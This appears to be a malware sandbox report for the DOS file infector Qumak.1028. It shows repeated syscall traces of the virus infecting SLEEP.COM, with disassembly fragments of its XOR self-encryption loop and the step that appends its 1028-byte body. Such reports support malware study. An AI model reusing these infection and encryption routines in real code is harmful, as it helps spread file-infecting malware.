Sample viewer

vx.netlux.org/Virus.DOS.Qumak.1028

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:21:53.286955185Z	48	PC: 12c8b \| Get DOS version
2018-12-17T22:21:53.288584014Z	47	PC: 12ca2 \| Get disk transfer address
2018-12-17T22:21:53.291586177Z	26	PC: 12cb1 \| Set disk transfer address
2018-12-17T22:21:53.293658139Z	78	PC: 12d49 \| Find first file
2018-12-17T22:21:53.316008824Z	61	PC: 12daf \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:21:53.325227836Z	63	PC: 12dc2 \| Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:21:53.333561759Z	62	PC: 12dc6 \| Close file
2018-12-17T22:21:53.336694767Z	67	PC: 12e09 \| Get or set file attributes
2018-12-17T22:21:53.344949217Z	67	PC: 12e19 \| Get or set file attributes
2018-12-17T22:21:53.366074455Z	61	PC: 12e23 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:21:53.380221612Z	87	PC: 12e2f \| Get or set file date and time
2018-12-17T22:21:53.382715976Z	44	PC: 12e39 \| Get time 0x12e39: and dh, 7 0x12e3c: jne 0x12e57 0x12e3e: mov ah, 0x40 0x12e40: mov cx, 5 0x12e43: mov dx, si 0x12e45: add dx, 0x8a 0x12e49: mov dx, si 0x12e4b: add dx, 0x8f 0x12e4f: mov ah, 9 0x12e51: int 0x21 0x12e53: jmp 0x12f0d 0x12e56: nop 0x12e57: mov ah, 0x3f 0x12e59: mov cx, 7 0x12e5c: mov dx, 0xad 0x12e5f: add dx, si 0x12e61: int 0x21 0x12e63: jae 0x12e68 0x12e65: jmp 0x12f0d 0x12e68: cmp ax, 7
2018-12-17T22:21:53.386598324Z	63	PC: 12e63 \| Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:21:53.39002967Z	66	PC: 12e7b \| Move file pointer
2018-12-17T22:21:53.392141327Z	44	PC: 12ea7 \| Get time 0x12ea7: mov dl, cl 0x12ea9: add dl, dh 0x12eab: add dl, 0x82 0x12eae: mov byte ptr [si - 1], dl 0x12eb1: mov bx, si 0x12eb3: mov cx, 0xf1 0x12eb6: mov al, byte ptr [bx] 0x12eb8: xor al, dl 0x12eba: mov byte ptr [bx], al 0x12ebc: inc bx 0x12ebd: loop 0x12eb6 0x12ebf: pop ax 0x12ec0: pop bx 0x12ec1: pop cx 0x12ec2: pop dx 0x12ec3: int 0x21 0x12ec5: push dx 0x12ec6: push cx 0x12ec7: push bx 0x12ec8: push ax
2018-12-17T22:21:53.396126699Z	64	PC: 12ec5 \| Write file or device (Write 1028 bytes on handle 5)
2018-12-17T22:21:53.40918915Z	66	PC: 12ef2 \| Move file pointer
2018-12-17T22:21:53.419569835Z	64	PC: 12f00 \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:21:53.43851795Z	64	PC: 12f0d \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:21:53.441866286Z	87	PC: 12f19 \| Get or set file date and time
2018-12-17T22:21:53.443940411Z	62	PC: 12f1d \| Close file
2018-12-17T22:21:53.454057773Z	67	PC: 12f2c \| Get or set file attributes
2018-12-17T22:21:53.465882932Z	26	PC: 12f36 \| Set disk transfer address
2018-12-17T22:21:53.467621204Z	9	PC: 12c50 \| Display string (String= 'Hello, world!!! ')
2018-12-17T22:21:53.478076436Z	76	PC: 12c55 \| Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":3827,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:16.773664421Z	48	PC: 12c8b \| Get DOS version
2018-12-25T11:50:16.775492497Z	47	PC: 12ca2 \| Get disk transfer address
2018-12-25T11:50:16.776961455Z	26	PC: 12cb1 \| Set disk transfer address
2018-12-25T11:50:16.77851967Z	78	PC: 12d49 \| Find first file
2018-12-25T11:50:16.785640838Z	61	PC: 12daf \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:16.790350287Z	63	PC: 12dc2 \| Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:50:16.796567776Z	62	PC: 12dc6 \| Close file
2018-12-25T11:50:16.799326473Z	67	PC: 12e09 \| Get or set file attributes
2018-12-25T11:50:16.809559803Z	67	PC: 12e19 \| Get or set file attributes
2018-12-25T11:50:16.829663698Z	61	PC: 12e23 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:16.834171246Z	87	PC: 12e2f \| Get or set file date and time
2018-12-25T11:50:16.836211542Z	44	PC: 12e39 \| Get time 0x12e39: and dh, 7 0x12e3c: jne 0x12e57 0x12e3e: mov ah, 0x40 0x12e40: mov cx, 5 0x12e43: mov dx, si 0x12e45: add dx, 0x8a 0x12e49: mov dx, si 0x12e4b: add dx, 0x8f 0x12e4f: mov ah, 9 0x12e51: int 0x21 0x12e53: jmp 0x12f0d 0x12e56: nop 0x12e57: mov ah, 0x3f 0x12e59: mov cx, 7 0x12e5c: mov dx, 0xad 0x12e5f: add dx, si 0x12e61: int 0x21 0x12e63: jae 0x12e68 0x12e65: jmp 0x12f0d 0x12e68: cmp ax, 7
2018-12-25T11:50:16.83829476Z	63	PC: 12e63 \| Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:50:16.845267743Z	66	PC: 12e7b \| Move file pointer
2018-12-25T11:50:16.847395343Z	44	PC: 12ea7 \| Get time 0x12ea7: mov dl, cl 0x12ea9: add dl, dh 0x12eab: add dl, 0x82 0x12eae: mov byte ptr [si - 1], dl 0x12eb1: mov bx, si 0x12eb3: mov cx, 0xf1 0x12eb6: mov al, byte ptr [bx] 0x12eb8: xor al, dl 0x12eba: mov byte ptr [bx], al 0x12ebc: inc bx 0x12ebd: loop 0x12eb6 0x12ebf: pop ax 0x12ec0: pop bx 0x12ec1: pop cx 0x12ec2: pop dx 0x12ec3: int 0x21 0x12ec5: push dx 0x12ec6: push cx 0x12ec7: push bx 0x12ec8: push ax
2018-12-25T11:50:16.849689687Z	64	PC: 12ec5 \| Write file or device (Write 1028 bytes on handle 5)
2018-12-25T11:50:16.858117943Z	66	PC: 12ef2 \| Move file pointer
2018-12-25T11:50:16.860152724Z	64	PC: 12f00 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:16.86650414Z	64	PC: 12f0d \| Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:16.868923841Z	87	PC: 12f19 \| Get or set file date and time
2018-12-25T11:50:16.871003546Z	62	PC: 12f1d \| Close file
2018-12-25T11:50:16.879201216Z	67	PC: 12f2c \| Get or set file attributes
2018-12-25T11:50:16.88911332Z	26	PC: 12f36 \| Set disk transfer address
2018-12-25T11:50:16.890648904Z	9	PC: 12c50 \| Display string (String= 'Hello, world!!! ')
2018-12-25T11:50:16.894452246Z	76	PC: 12c55 \| Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":3827,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:50:16.864408816Z	48	PC: 12c8b \| Get DOS version
2018-12-25T11:50:16.866075778Z	47	PC: 12ca2 \| Get disk transfer address
2018-12-25T11:50:16.867253879Z	26	PC: 12cb1 \| Set disk transfer address
2018-12-25T11:50:16.868508662Z	78	PC: 12d49 \| Find first file
2018-12-25T11:50:16.875530939Z	61	PC: 12daf \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:16.882960663Z	63	PC: 12dc2 \| Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:50:16.889904008Z	62	PC: 12dc6 \| Close file
2018-12-25T11:50:16.891801491Z	67	PC: 12e09 \| Get or set file attributes
2018-12-25T11:50:16.898362653Z	67	PC: 12e19 \| Get or set file attributes
2018-12-25T11:50:16.916153675Z	61	PC: 12e23 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:50:16.923473304Z	87	PC: 12e2f \| Get or set file date and time
2018-12-25T11:50:16.925471132Z	44	PC: 12e39 \| Get time 0x12e39: and dh, 7 0x12e3c: jne 0x12e57 0x12e3e: mov ah, 0x40 0x12e40: mov cx, 5 0x12e43: mov dx, si 0x12e45: add dx, 0x8a 0x12e49: mov dx, si 0x12e4b: add dx, 0x8f 0x12e4f: mov ah, 9 0x12e51: int 0x21 0x12e53: jmp 0x12f0d 0x12e56: nop 0x12e57: mov ah, 0x3f 0x12e59: mov cx, 7 0x12e5c: mov dx, 0xad 0x12e5f: add dx, si 0x12e61: int 0x21 0x12e63: jae 0x12e68 0x12e65: jmp 0x12f0d 0x12e68: cmp ax, 7
2018-12-25T11:50:16.927718624Z	63	PC: 12e63 \| Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:50:16.930511257Z	66	PC: 12e7b \| Move file pointer
2018-12-25T11:50:16.932245482Z	44	PC: 12ea7 \| Get time 0x12ea7: mov dl, cl 0x12ea9: add dl, dh 0x12eab: add dl, 0x82 0x12eae: mov byte ptr [si - 1], dl 0x12eb1: mov bx, si 0x12eb3: mov cx, 0xf1 0x12eb6: mov al, byte ptr [bx] 0x12eb8: xor al, dl 0x12eba: mov byte ptr [bx], al 0x12ebc: inc bx 0x12ebd: loop 0x12eb6 0x12ebf: pop ax 0x12ec0: pop bx 0x12ec1: pop cx 0x12ec2: pop dx 0x12ec3: int 0x21 0x12ec5: push dx 0x12ec6: push cx 0x12ec7: push bx 0x12ec8: push ax
2018-12-25T11:50:16.934590606Z	64	PC: 12ec5 \| Write file or device (Write 1028 bytes on handle 5)
2018-12-25T11:50:16.944155921Z	66	PC: 12ef2 \| Move file pointer
2018-12-25T11:50:16.945895303Z	64	PC: 12f00 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:50:16.953200029Z	64	PC: 12f0d \| Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:50:16.955864347Z	87	PC: 12f19 \| Get or set file date and time
2018-12-25T11:50:16.957975695Z	62	PC: 12f1d \| Close file
2018-12-25T11:50:16.966401625Z	67	PC: 12f2c \| Get or set file attributes
2018-12-25T11:50:16.978132724Z	26	PC: 12f36 \| Set disk transfer address
2018-12-25T11:50:16.979685786Z	9	PC: 12c50 \| Display string (String= 'Hello, world!!! ')
2018-12-25T11:50:16.984078048Z	76	PC: 12c55 \| Terminate with return code (Return code = '0')